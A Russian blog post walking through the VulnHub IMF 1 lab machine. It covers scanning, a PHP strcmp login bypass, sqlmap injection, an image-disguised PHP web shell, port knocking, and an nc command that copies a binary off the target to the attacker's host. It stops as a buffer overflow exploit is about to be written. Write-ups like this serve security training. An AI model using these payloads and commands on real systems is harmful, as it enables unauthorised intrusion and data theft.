{"id":283321,"date":"2016-12-31T00:30:04","date_gmt":"2016-12-30T21:30:04","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=283321"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=283321","title":{"rendered":"VulnHub: \u0420\u0430\u0437\u0431\u043e\u0440 IMF 1 \u0438 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0435 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0431\u0443\u0444\u0435\u0440\u0430"},"content":{"rendered":"

<\/p>\n

$ sudo arp-scan -l -I wlan0| grep "CADMUS COMPUTER SYSTEMS" | awk '{print $1}' | xargs sudo nmap -sV -p1-65535<\/code><\/pre>\n
  <\/p>\n
Starting Nmap 7.01 ( nmap.org<\/a> ) at 2016-12-25 22:41 MSK
  Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
  SYN Stealth Scan Timing: About 1.40% done; ETC: 22:44 (0:03:31 remaining)
  Nmap scan report for 192.168.1.116
  Host is up (0.00046s latency).
  PORT STATE SERVICE VERSION
  80\/tcp open http Apache httpd 2.4.18 ((Ubuntu))
  MAC Address: 08:00:27:40:8D:1B (Oracle VirtualBox virtual NIC)<\/p><\/blockquote>\n
  <\/a>  <\/p>\n
Flag 1<\/h3>\n
  \u041f\u0440\u0438\u0441\u0442\u0443\u043f\u0430\u0435\u043c \u043a \u043f\u043e\u0438\u0441\u043a\u0443 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439 \u043d\u0430 \u0441\u0430\u0439\u0442\u0435:  <\/p>\n
$ sudo dirsearch -u 'http:\/\/192.168.1.116' -e php,html,bak,txt,jpg,json -w \/usr\/share\/dirb\/wordlists\/big.txt -r -f -x 403<\/code><\/pre>\n
  <\/p>\n
  \u041f\u0440\u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u044f \u043a\u0430\u0436\u0434\u0443\u044e \u0438\u0437 \u043d\u0430\u0439\u0434\u0435\u043d\u044b\u0445 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0438 \u0438\u0445 \u043a\u043e\u0434, \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 contact.php<\/i>, \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u043f\u0435\u0440\u0432\u044b\u0439 \u0444\u043b\u0430\u0433:  <\/p>\n
<section id="service">         <div class="container">             <!-- flag1{YWxsdGhlZmlsZXM=} -->             <div class="service-wrapper">                 <div class="row">                     <div class="col-md-4 col-sm-6">                         <div class="block wow fadeInRight" data-wow-delay="1s">                             <div class="icon">                                <i class="fa fa-desktop"><\/i>                              <\/div>                             <h3>Roger S. Michaels<\/h3>                             <p>rmichaels@imf.local<\/p>                             <p>Director<\/p>                         <\/div>                     <\/div>                     <div class="col-md-4 col-sm-6">                         <div class="block wow fadeInRight" data-wow-delay="1.3s">                             <div class="icon">                                 <i class="fa  fa-paper-plane"><\/i>                             <\/div>                             <h3>Alexander B. Keith<\/h3>                             <p>akeith@imf.local<\/p>                             <p>Deputy Director<\/p>                         <\/div>                     <\/div>                     <div class="col-md-4 col-sm-6">                         <div class="block wow fadeInRight" data-wow-delay="1.6s">                             <div class="icon">                                 <i class="fa  fa-file-text"><\/i>                             <\/div>                             <h3>Elizabeth R. Stone<\/h3>                             <p>estone@imf.local<\/p>                             <p>Chief of Staff<\/p>                         <\/div>                     <\/div>                 <\/div>             <\/div>         <\/div> <\/section> <\/code><\/pre>\n
  \u041f\u043e\u043c\u0438\u043c\u043e \u0444\u043b\u0430\u0433\u0430 flag1{YWxsdGhlZmlsZXM=}<\/i>, \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0442\u0443\u0442 \u0435\u0449\u0451 \u0438 \u0441\u043f\u0438\u0441\u043e\u043a e-mail \u0430\u0434\u0440\u0435\u0441\u043e\u0432 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432:  <\/p>\n
estone@imf.local
  akeith@imf.local
  rmichaels@imf.local<\/p><\/blockquote>\n
  \u0421\u043e\u0445\u0440\u0430\u043d\u0438\u043c \u0435\u0433\u043e \u043f\u043e\u043a\u0430, \u0430 \u0440\u0430\u0441\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u0432 \u0444\u043b\u0430\u0433, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0443 \u043a \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u043c\u0443:  <\/p>\n
$ echo YWxsdGhlZmlsZXM= | base64 -d allthefiles<\/code><\/pre>\n
Flag 2<\/h3>\n
  \u041f\u0440\u0438 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u043c \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0435, \u0442\u0430\u043c \u0436\u0435 \u0432 \u043a\u043e\u0434\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0439 \u0443\u0447\u0430\u0441\u0442\u043e\u043a:  <\/p>\n
        <script src="js\/ZmxhZzJ7YVcxbVl.js"><\/script>         <script src="js\/XUnRhVzVwYzNS.js"><\/script>         <script src="js\/eVlYUnZjZz09fQ==.min.js"><\/script> <\/code><\/pre>\n
  \u041f\u043e\u0445\u043e\u0436\u0435 \u043d\u0430 base64. \u0421\u043e\u0435\u0434\u0438\u043d\u0438\u0432 \u0432\u0441\u0451 \u0432\u043c\u0435\u0441\u0442\u0435, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0432\u0442\u043e\u0440\u043e\u0439 \u0444\u043b\u0430\u0433:  <\/p>\n
$ echo ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ== | base64 -d flag2{aW1mYWRtaW5pc3RyYXRvcg==} $ echo aW1mYWRtaW5pc3RyYXRvcg== | base64 -d imfadministrator <\/code><\/pre>\n
Flag 3<\/h3>\n
  \u041d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u043e\u0439 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435, \u043a\u0440\u0443\u0442\u0438\u0442\u0441\u044f \u0444\u043e\u0440\u043c\u0430 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438, \u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439 \u0432 \u043a\u043e\u0434\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b:
    <\/p>\n
<form method="POST" action=""> <label>Username:<\/label><input type="text" name="user" value=""><br \/> <label>Password:<\/label><input type="password" name="pass" value=""><br \/> <input type="submit" value="Login"> <!-- I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger --> <\/form><\/code><\/pre>\n
  \u0425\u043c, \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u0434\u043b\u044f \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u044f \u0441\u0442\u0440\u043e\u043a \u0441 \u0443\u0447\u0451\u0442\u043e\u043c \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430 \u0432 PHP \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043b\u0438\u0431\u043e ==<\/i>, \u043b\u0438\u0431\u043e strcmp<\/i>. \u0423 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439, \u0435\u0441\u0442\u044c \u043e\u0434\u043d\u0430 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c, \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0432\u0435\u0440\u043d\u0451\u0442 0, \u0435\u0441\u043b\u0438 \u0441\u0442\u0440\u043e\u043a\u0430 \u0431\u0443\u0434\u0435\u0442 \u0441\u0440\u0430\u0432\u043d\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u0441 \u043c\u0430\u0441\u0441\u0438\u0432\u043e\u043c. 
  \u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0442\u0443\u0442 \u044d\u0442\u043e. \u0417\u0430\u043c\u0435\u043d\u0438\u0432 pass<\/i> \u043d\u0430 pass[]<\/i>, \u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043f\u043e\u0434 \u043b\u043e\u0433\u0438\u043d\u043e\u043c: rmichaels. \u0412\u0441\u0451 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u0442 \u0443\u0441\u043f\u0435\u0448\u043d\u043e! +1 \u0444\u043b\u0430\u0433:  <\/p>\n
flag3{Y29udGludWVUT2Ntcw==}<br \/>Welcome, rmichaels<br \/><a href='cms.php?pagename=home'>IMF CMS<\/a><\/code><\/pre>\n
  <\/p>\n
$ echo Y29udGludWVUT2Ntcw== | base64 -d continueTOcms<\/code><\/pre>\n
Flag 4<\/h3>\n
  \u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435, \u0438 \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u043c \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443:
  <\/p>\n
  \u041f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 \u0432 \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0435 \u0441\u0440\u0430\u0437\u0443 \u043d\u0430\u043c\u0435\u043a\u0430\u0435\u0442 \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0411\u0414, \u043b\u0438\u0431\u043e \u043d\u0430 Path Traversal<\/a>. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u0442\u0434\u0430\u0451\u043c \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 \u0432 sqlmap<\/i> \u0438 \u043d\u0430\u0441\u043b\u0430\u0436\u0434\u0430\u0435\u043c\u0441\u044f \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u043c:  <\/p>\n
sudo sqlmap -u 'http:\/\/192.168.1.116\/imfadministrator\/cms.php?pagename=home' --cookie 'PHPSESSID=pms0cbae74vmfta3spk4kac5q5' --level=5 --risk=3 --dbs --random-agent<\/code><\/pre>\n
  \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439:  <\/p>\n
[15:23:55] [INFO] GET parameter ‘pagename’ appears to be ‘AND boolean-based blind \u2014 WHERE or HAVING clause’ injectable (with —string=\u00abthe\u00bb)
  [15:23:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be ‘MySQL’ 
  [15:24:10] [INFO] GET parameter ‘pagename’ is ‘MySQL UNION query (NULL) \u2014 1 to 20 columns’ injectable<\/p><\/blockquote>\n
  \u0418 \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0441\u0447\u0451\u0442\u0435, sqlmap<\/i> \u0432\u044b\u0434\u0430\u0451\u0442 \u0441\u043f\u0438\u0441\u043e\u043a \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0431\u0430\u0437 \u0434\u0430\u043d\u043d\u044b\u0445:  <\/p>\n
available databases [5]: 
  [*] admin
  [*] information_schema
  [*] mysql
  [*] performance_schema
  [*] sys  <\/p><\/blockquote>\n
  \u0422\u0443\u0442 \u043d\u0430\u0438\u0431\u043e\u043b\u044c\u0448\u0438\u0439 \u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0431\u0430\u0437\u0430 Admin<\/i>, \u0441 \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0442\u0430\u0431\u043b\u0438\u0446\u0435\u0439 pages<\/i>  <\/p>\n
\u0414\u0430\u043c\u043f \u044d\u0442\u043e\u0439 \u0442\u0430\u0431\u043b\u0438\u0446\u044b<\/b><\/p>\n
  <\/div>\n<\/div>\n
  \u0422\u0443\u0442 \u043c\u044b \u0432\u0438\u0434\u0438\u043c \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0435\u0449\u0451 \u043e\u0434\u043d\u043e\u0439 \u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b tutorials-incomplete<\/i>. \u041a\u0430\u043a \u0432\u0438\u0434\u043d\u043e \u0438\u0437 \u043a\u043e\u0434\u0430, \u0442\u0430\u043c \u0432\u0441\u0435\u0433\u043e \u043e\u0434\u043d\u043e \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u0435:
  <\/p>\n
  QR \u043a\u043e\u0434 \u0442\u0443\u0442 \u044f\u0432\u043d\u043e \u043b\u0438\u0448\u043d\u0438\u0439, \u0432\u044b\u0440\u0435\u0437\u0430\u0435\u043c \u0435\u0433\u043e \u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c \u043d\u0430 \u0441\u0430\u0439\u0442<\/a>, \u0433\u0434\u0435 \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0444\u043b\u0430\u0433: flag4{dXBsb2Fkcjk0Mi5waHA=}<\/i> \u0438 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0443:  <\/p>\n
$ echo dXBsb2Fkcjk0Mi5waHA= | base64 -d uploadr942.php<\/code><\/pre>\n
Flag 5<\/h3>\n
  \u041f\u0435\u0440\u0435\u0439\u0434\u044f \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443, \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0444\u043e\u0440\u043c\u0430 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0444\u0430\u0439\u043b\u043e\u0432. \u041f\u043e\u0441\u043b\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043f\u043e\u043f\u044b\u0442\u043e\u043a, \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0435\u043c, \u0447\u0442\u043e \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u043c\u043e\u0436\u043d\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f: \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043e\u043a, \u0442\u0430\u043a \u0438 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u0430. \u041f\u043e\u0441\u043b\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438, \u0432 \u043a\u043e\u0434\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430:  <\/p>\n
<html> <head> <title>File Uploader<\/title> <\/head> <body> <h1>Intelligence Upload Form<\/h1>  File successfully uploaded. <!-- 4e8c80f6f326 --><form id="Upload" action="" enctype="multipart\/form-data" method="post"> \t<p>  \t\t<label for="file">File to upload:<\/label>  \t\t<input id="file" type="file" name="file">  \t<\/p>                        <p>      \t<input id="submit" type="submit" name="submit" value="Upload">      <\/p>  <\/form> <\/body> <\/html><\/code><\/pre>\n
  \u041f\u0440\u043e\u0432\u0435\u0440\u0438\u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e uploads<\/i>, \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0442\u0430\u043c \u043d\u0430\u0448 \u0444\u0430\u0439\u043b. \u041f\u0440\u043e\u0431\u0443\u0435\u043c \u0437\u0430\u043b\u0438\u0442\u044c \u0448\u0435\u043b\u043b \u0447\u0435\u0440\u0435\u0437 \u0444\u0430\u0439\u043b shell.gif<\/i>:  <\/p>\n
GIF89a <?php system($_GET['cmd']); ?><\/code><\/pre>\n
  \u0418 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0432 \u043e\u0442\u0432\u0435\u0442 \u043e\u0448\u0438\u0431\u043a\u0443!
  <\/p>\n
  \u041e\u041a, \u0438\u0437 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 PHP \u043a \u0444\u0443\u043d\u043a\u0446\u0438\u044f\u043c system<\/i> \u0438 exec<\/i>, \u043c\u043e\u0436\u043d\u043e \u0443\u0437\u043d\u0430\u0442\u044c \u0447\u0442\u043e \u0432\u043c\u0435\u0441\u0442\u043e \u043d\u0438\u0445 \u0442\u0430\u043a \u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432\u043e\u0442 \u0442\u0430\u043a\u0443\u044e \u043a\u043e\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u044e:  <\/p>\n
echo `id`;<\/code><\/pre>\n
  \u0418\u0441\u043f\u0440\u0430\u0432\u0438\u043c \u0448\u0435\u043b\u043b \u0438 \u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0435\u0433\u043e:  <\/p>\n
GIF89a <?php $cmd=$_GET['cmd']; print(`$cmd`); ?><\/code><\/pre>\n
  <\/p>\n
  \u042d\u0442\u043e \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u043e! \u041e\u0442\u043b\u0438\u0447\u043d\u043e! \u041d\u0430\u0445\u043e\u0434\u0438\u043c \u0432 \u044d\u0442\u043e\u043c \u0436\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 \u043f\u044f\u0442\u044b\u0439 \u0444\u043b\u0430\u0433 flag5{YWdlbnRzZXJ2aWNlcw==}<\/i>
  \u0418 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u0430\u044f \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0430, \u043a\u0443\u0434\u0430 \u0434\u0432\u0438\u0433\u0430\u0442\u044c\u0441\u044f \u0434\u0430\u043b\u044c\u0448\u0435:  <\/p>\n
$ echo YWdlbnRzZXJ2aWNlcw== | base64 -d agentservices<\/code><\/pre>\n
Flag 6<\/h3>\n
  \u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u043f\u043e\u0438\u0441\u043a\u0430\u0442\u044c \u044d\u0442\u043e\u0442 \u0441\u0435\u0440\u0432\u0438\u0441, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 PHP shell (\u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u043d\u044b\u0435 \u0447\u0435\u0440\u0435\u0437 \u044d\u0442\u043e\u0442 \u0448\u0435\u043b\u043b \u0431\u0443\u0434\u0443\u0442 \u043d\u0430\u0447\u0438\u043d\u0430\u0442\u044c\u0441\u044f \u0441 "> "). \u0412\u044b\u0432\u043e\u0434 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0434\u0430\u043b, \u0430 \u0432\u043e\u0442 \u0444\u0430\u0439\u043b services<\/i> \u043e\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u043c:  <\/p>\n
> cat \/etc\/services | grep agent cmip-agent\t164\/tcp cmip-agent\t164\/udp zabbix-agent\t10050\/tcp\t\t\t# Zabbix Agent zabbix-agent\t10050\/udp agent\t\t7788\/tcp\t\t\t# Agent service<\/code><\/pre>\n
  \u0412\u0441\u0451 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e, \u043a\u0440\u043e\u043c\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0441\u0442\u0440\u043e\u043a\u0438. \u041d\u043e nmap<\/i> \u043d\u0435 \u043d\u0430\u0448\u0451\u043b \u044d\u0442\u043e\u0442 \u043f\u043e\u0440\u0442 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c, \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0441\u0435\u0440\u0432\u0438\u0441 \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c, \u043b\u0438\u0431\u043e \u0442\u0443\u0442 port knocking<\/i>.
  \u0417\u0430\u043f\u0443\u0441\u0442\u0438\u043c \u0435\u0433\u043e:  <\/p>\n
> agent<\/code><\/pre>\n
  <\/p>\n
  \u0421\u0435\u0440\u0432\u0438\u0441 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b\u0441\u044f, \u0432\u044b\u0434\u0430\u043b \u043f\u0440\u0438\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u0435, \u043e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0440\u0442 \u043f\u043e \u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u043d\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d. \u041f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0432 \u043e\u0442\u044b\u0441\u043a\u0430\u0442\u044c \u0441\u0435\u0440\u0432\u0438\u0441, \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0440\u044f\u0434\u043e\u043c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u0444\u0430\u0439\u043b:  <\/p>\n
> whereis agent agent: \/usr\/local\/bin\/agent > ls -ahl \/usr\/local\/bin\/ -rw-r--r--  1 root root   19 Oct 16 08:11 access_codes -rwxr-xr-x  1 root root  12K Oct 12 22:39 agent > cat \/usr\/local\/bin\/access_codes SYN 7482,8279,9467<\/code><\/pre>\n
  \u0414\u0430, \u044d\u0442\u043e \u043e\u0447\u0435\u043d\u044c \u043f\u043e\u0445\u043e\u0436\u0435 \u043d\u0430 port knocking, \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u043c:  <\/p>\n
sudo knock 192.168.1.116 7482 8279 9467; sudo nmap 192.168.1.116 -p7788<\/code><\/pre>\n
  <\/p>\n
Starting Nmap 7.01 ( nmap.org<\/a> ) at 2016-12-30 22:31 MSK
  Nmap scan report for 192.168.1.116
  Host is up (0.00030s latency).
  PORT STATE SERVICE
  7788\/tcp open unknown
  MAC Address: 08:00:27:40:8D:1B (Oracle VirtualBox virtual NIC)  <\/p><\/blockquote>\n
  \u041f\u043e\u0440\u0442 \u043e\u0442\u043a\u0440\u044b\u043b\u0441\u044f, \u043f\u043e\u0441\u043b\u0435 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043a \u043d\u0435\u043c\u0443, \u0441\u043d\u043e\u0432\u0430 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0440\u0438\u0433\u043b\u0430\u0448\u0435\u043d\u0438\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 agent<\/i>. 
  \u042d\u0442\u043e \u0432\u0441\u0451 \u0445\u043e\u0440\u043e\u0448\u043e, \u043d\u043e \u0434\u043b\u044f \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0435\u043d\u0438\u044f \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u044d\u0442\u0438\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u043c \u0435\u043c\u0443 \u043d\u0443\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0434\u0430\u0442\u044c ID<\/i>. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u043c \u0435\u0433\u043e \u0441\u0435\u0431\u0435 \u0434\u043b\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430:  <\/p>\n
$ nc -l -p 9999 > agent > nc 192.168.1.124 9999 < \/usr\/local\/bin\/agent<\/code><\/pre>\n
  \u041e\u0442\u043a\u0440\u044b\u0432 \u0435\u0433\u043e \u0432 IDA, \u0438 \u043f\u0435\u0440\u0435\u0439\u0434\u044f \u043d\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044e main<\/i>, \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0432\u0435\u0440\u043d\u044b\u0439 ID<\/i>
  <\/p>\n
  \u0414\u0430\u043b\u0435\u0435 \u043f\u043e\u0441\u043b\u0435 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0430 \u043a\u043e\u0434\u0430, \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u043f\u043e\u0441\u043b\u0435 \u0432\u0432\u043e\u0434\u0430 ID \u0441\u0435\u0440\u0432\u0438\u0441 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043c\u0435\u043d\u044e, \u0438 \u0432 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u0432\u044b\u0431\u0440\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u0443\u043d\u043a\u0442\u0430 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0442\u0443 \u0438\u043b\u0438 \u0438\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e, \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0442\u0443\u0442 \u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u044f report<\/i>
  <\/p>\n
  \u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e \u0442\u0443\u0442 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0432\u0432\u043e\u0434\u0430, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u0430\u043c\u043e\u0435 \u043e\u0431\u044b\u0447\u043d\u043e\u0435 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0431\u0443\u0444\u0435\u0440\u0430. \u0417\u0430\u043f\u0443\u0441\u0442\u0438\u043c \u0435\u0433\u043e \u0432 peda<\/i> \u0438 \u043d\u0430\u0439\u0434\u0451\u043c \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u0435, \u043f\u043e \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d \u0430\u0434\u0440\u0435\u0441 \u0432\u043e\u0437\u0432\u0440\u0430\u0442\u0430. \u0421\u043e\u0437\u0434\u0430\u0451\u043c \u043f\u0430\u0442\u0442\u0435\u0440\u043d:
  <\/p>\n
  \u041f\u0435\u0440\u0435\u0434\u0430\u0451\u043c \u0435\u0433\u043e \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u044e report<\/i>
  <\/p>\n
  \u041f\u043e\u0441\u043b\u0435 \u043a\u0440\u0430\u0445\u0430, \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u044f.
  <\/p>\n
  \u041e\u0442\u043b\u0438\u0447\u043d\u043e, \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u0442\u044c \u043a \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u0438\u044e \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430.
